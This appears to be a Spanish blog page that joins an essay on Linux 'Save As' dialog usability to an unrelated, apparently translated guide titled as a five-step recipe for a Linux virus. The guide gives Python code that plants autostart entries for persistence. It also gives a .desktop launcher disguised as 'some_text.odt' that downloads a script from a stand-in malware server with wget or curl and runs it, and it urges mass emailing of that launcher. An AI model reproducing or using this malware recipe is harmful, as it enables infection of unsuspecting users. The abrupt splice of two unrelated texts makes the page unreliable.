La acción “Guardar Como” simplemente debería ofrecerte:

• Nombre para guardar el archivo
• Extensión del archivo (es mejor ofrecerle un valor por defecto al usuario que dejarlo solo con la opción, si fuimos capaces de crear un Mega-hiper-ozom-ambilibabol software, no nos cuesta nada darle la mejor opción de guardado que tenga nuestro software)
• El lugar de destino, he visto a muy poca gente usar los accesos directos que tiene ya sea a su /home/Documentos o a Mis Documentos, una practica muy común es que tengan un directorio con su nombre en el escritorio donde van guardando todo, el síndrome de “este PC es mio y estos son MIS archivos”, prefieren asegurarse e ir directorio por directorio por eso ofrecerles la ultima ruta donde guardaron por defecto me parece buena practica, pero es bien sabido que el botón mas usado del Navegador es el Atrás (Back), es su oportunidad de “empezar de nuevo” por eso solo basta, en el caso de GNU/Linux, con el enlace al /home y de ahí que hagan lo que les plazca
• Opciónes avanzadas, lo que sospechaban, ningún mortal las usa. una buena analogía sería la siguiente : “si entiendes una de las licencias Creative Commons eres un usuario normal, si alguna ves quisiste o tuviste la intención de ver la licencia completa eres Geek o usuario avanzado.” ¿mate a varios no?

Pero tiempo después me di cuenta que el problema no es sólo el desorden que hay en ciertas ventanas de dialogo, ni tampoco la poca usabilidad.

Luego de una reflexión casi digna de un Monje Tibetano, descubrí cuál era la mejor ventaja de Mac OS X y Windows sobre este tema, y la verdad es cruda. La unificación del desarrollo de sus aplicaciónes, en el caso de Mac por ejemplo, donde los desarroladores tienen a su disposición una infinidad de manuales y normas gráficas, así como también librerias que lo hacen posible (léase Cocoa, Carbon); en Windows pasa algo similar.

El problema de Gnome, KDE, y otros, es que ambos disponen de MILES de formas de desarrollo, donde los desarrolladores pueden usar tanto GTK, QT, TCL/TK, Python, Mono, etc… (GLADE es un muy buen RAD, pero no para los que quieren empezar) para el desarrollo dentro de cualquier gestor de ventanas (claro los que usa Zerial no cuentan en este post) y es esa capacidad lo que lo convierte en la mejor ventaja, la DIVERSIDAD.

diversidad.

(Del lat. diversĭtas, -ātis).

1. f. Variedad, desemejanza, diferencia.

2. f. Abundancia, gran cantidad de varias cosas distintas.

Tomando esta última acepción es donde esta el fuerte de GNU/Linux y toda su gama de soluciones, es cosa de visitar KDE-apps ó GTK-apps ningún otro sistema operativo puede alardear de tantas soluciones. Pero ojo, tengo en la mira una distro en especial que quizó realmente hacer las cosas bien Moblin, los que de la audiencia tengan un netbook denle una oportunidad. ¿Qué prefieren ustedes? ¿Cantidad o Calidad?

N. del Autor: Quiero agradecer a hypn por la oportunidad de generar polimica y un saludo para mi mamá que no me esta viendo.

Guía compacta paso a paso.

1. Escribir una parte del malware de su elección. Tal vez como un Script en Python? Buen lenguaje, eficiente código, pre-instalado en la mayoría de distribuciones Linux y poderosa biblioteca estándar de apoyo (por ejemplo, las bibliotecas para el envío y manejo de peticiones HTTP y SMTP  son parte de la mayoría de las instalaciones). Ubicar el malware en algun web-server.

2. El malware necesita la habilidad de instalar un Auto-Arranque que sera lanzado cada vez que el usuario se loguee.  Como ya se menciono para Gnome significa crear  la descripción del arranque en la carpeta ” ~/.config/autostart “.  Para KDE solo enlazar  el ejecutable desde el directorio “ ~/.kde/Autostart “.  Hacer que el código del malware pueda forzar y copiar o linkear un enlace hacia el en ambas ubicaciones  (creación de directorios en el camino si no existe) o puede ser un poco inteligente y elegir lo correcto a hacer basado en el entorno de escritorio que se detecta.

Por ejemplo, para crear el acceso directo para KDE, todo lo que se necesita  escribir en Python es el siguiente:

import os
uname = os.getlogin()
drop_dir = “/home/%s/.kde/Autostart” % uname)
os.makedirs(drop_dir)
os.symlink(“/home/%s/.local/.hidden/s.py” % uname, drop_dir+“/s.py”)

Para Gnome el script necesario para escribir un arranque en el directorio necesario es el siguiente:

import os
relauncher_str = “”"
[Desktop Entry]
Type=Application
Name=Malware
Exec=python .local/.hidden/s.py
Icon=system-run
“”"
uname = os.getlogin()
drop_dir = “/home/%s/.config/autostart” % uname
os.makedirs(drop_dir)
f = open(drop_dir+”/Malware.desktop”, “w”)
f.write(relauncher_str)
f.close()

Escribir esas entradas de auto-arranque es probablemente una de las primeras cosas que debería hacer el malware.

3. Ahora crear un lanzador de escritorio para el archivo instalador del malware, que es diferente que el lanzador que usamos para reiniciar el programa malware después de un reinicio del sistema. El lanzador de escritorio para el instalador es lo que se enviará como archivo adjunto en el correo electrónico dirigido al usuario. Es en lo que el usuario hace click vez que guardó. Pruebe algo como esto:

[Desktop Entry]
Type=Application
Name=some_text.odt
Exec=bash -c ‘URL=http://www.my_malware_server.com/s.py ;
DROP=~/.local/.hidden ;
mkdir -p $DROP;
if [ -e /usr/bin/wget ] ;
then wget $URL -O $DROP/s.py ;
else curl $URL -o $DROP/s.py ; fi;
python $DROP/s.py’
Icon=/usr/share/icons/hicolor/48×48/apps/ooo-writer.png

Tenga en cuenta que se ha especificado un nombre que es de aspecto inofensivo e incluso se optó por un icono que le hace parecer como un documento normal (este icono está presente tanto en sistemas Ubuntu (Gnome) y Kubuntu (KDE), pero no necesariamente en Fedora). Si usted quiere enviar fotos de desnudos en el correo electrónico, basta con darle un nombre que lo hace sonar como una imagen (con algo. Jpg al final) y eligir uno de los iconos estándar de imagen.

La linea de ejecución es un poco mas larga ahora,  porque tenemos que contar con la posibilidad de que sea instalado con wget o curl.  Por ejemplo sistemas Ubuntu suelen utilizar wget, mientras que fedora trae curl.  Entonces lo que se necesita es llamar a los correctos comandos bash para detectar cual esta presente y con cual descargaremos el malware.  No soy un experto en bash por lo que debe haber una manera mas eficiente de hacer esto.  Pero tienes la idea.  Asimismo, en esa línea estamos creando una buena ubicación para el script ($ DROP), que no es inmediatamente evidente. El comando mkdir con la opción-p  silenciosamente creará cualesquiera directorios padres que sean necesarios. Nuestro directorio esta en el  home del usuario, escondido en algún inocente directorio local  y sólo puede ser visto también en el caso de mostrar archivos ocultos. El directorio / tmp, por supuesto, no es un buen lugar para nuestro programa malicioso, ya que se limpia con cada reinicio del sistema.

Guardar este archivo lanzador con el nombre que se ha especificado en la linea “Name”, pero añadir ‘. Desktop’ al final del nombre de archivo real. Así pues, en nuestro caso, se debería guardar el archivo como ’some_text.odt.desktop’ . Cuando este ubicado en su escritorio, verá que en Gnome o KDE será tratado de manera especial, no se muestra la  extensión ‘. Desktop’ . Así, el archivo sólo aparece como ’some_text.odt’ . Por supuesto, eso también significa que el archivo adjunto de correo tendrá esta ampliación también. Algunos usuarios lo pueden notar, muchos otros no.

4. Adjunte este archivo a un correo electrónico, que le pida al destinatario que guarde y abra el archivo adjunto. Como se ha explicado, una vez que se ha guardado que sólo aparecen como ’some_text.odt ‘ en el escritorio del usuario. Y con el icono que hemos elegido en el descriptor del lanzador  que parecen inofensivos.

5. envía este mensaje a la mayor cantidad de direcciones de correo electrónico que puedas tener.

Voila! Un virus de Linux en 5 sencillos pasos. Cada usuario que abre y guarda el archivo adjunto que les han enviado se infectará con el malware script de su elección, que también se reinicia cada vez que el usuario se conecta de nuevo.

Eso fue fácil, ¿no?

Artículo completo en inglés: GeekZone